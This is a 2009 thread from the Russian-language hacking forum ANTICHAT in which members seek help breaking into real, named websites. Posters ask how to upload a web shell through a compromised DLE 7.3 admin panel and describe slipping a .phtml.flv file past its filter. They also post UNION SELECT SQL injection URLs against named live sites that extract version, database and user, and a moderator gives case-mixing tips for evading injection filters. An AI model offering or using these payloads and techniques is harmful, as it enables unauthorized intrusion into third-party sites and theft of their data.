ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
13.08.2009, 15:55
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968
Репутация:
10
|
|
Есть доступ к dle админке, версия 7.3.
Включил возможность добавлять файлы, но к новости так прикрепить и не смог.
Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:
PHP код:
<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>
Какие есть способы залить шел? Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?
Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач. 
|
|
|
16.08.2009, 03:55
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968
Репутация:
10
|
|
Сообщение от u36a
Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?
Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач. .php перед flv убирается движком..
Удалось залить файл ......../uploads/files/1250379992_functions.phtml.flv
но он не интрепретируется, а скачивается...
Какие ещё есть варианты залить шел через движок дле 7.3 версии?
|
|
|
|
14.08.2009, 15:57
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
http://www.broowaha.com/profile.php?id=-2434+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,9,0,11,12,13,14,15,16,17/*
|
|
|
|
15.08.2009, 02:04
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137
Репутация:
66
|
|
Вопрос: есть бажный PHP-скрипт, который использует значение переменной HTTP_HOST при генерации XML (то есть в самом XML это значение используется без какого-либо экранирования спец. символов) и потом его отдаёт на скачивание. Что можно провернуть в данном случае? Да, мы можем варьировать HTTP Host заголовком..но что это нам даёт?
|
|
|
|
15.08.2009, 02:44
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет
|
|
|
|
15.08.2009, 19:18
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137
Репутация:
66
|
|
Сообщение от bons
если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет
Только в случае, если виртуальные хосты host-based.
Уязвимость имеет место, то есть скрипт исполняется и в теле XML фигурирует значение Host-заголовка.
|
|
|
|
15.08.2009, 21:26
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
нашел скулю но там какая-та фильтрация
смотрим
видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058
видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1
если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8
но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
|
|
|
|
16.08.2009, 00:28
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Сообщение от Grema
нашел скулю но там какая-та фильтрация
смотрим
видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058
видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1
если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8
но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
ne nadoelo? Nu prob'esh ty golovoy stenku. chto ty budesh delat' v sosednej kamere?
|
|
|
|
16.08.2009, 05:44
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Grema
нашел скулю но там какая-та фильтрация
смотрим
видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058
видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1
если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8
но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
Может быть intval();
Хотя &showuser=3058-1 работает.
пробуй
unIoN+SeLecT
Может быть просто фильтр.
|
|
|
|
15.08.2009, 18:54
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Если вам надо версию то )
&chapNum=-1+union+select+version()
И таким макаром |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
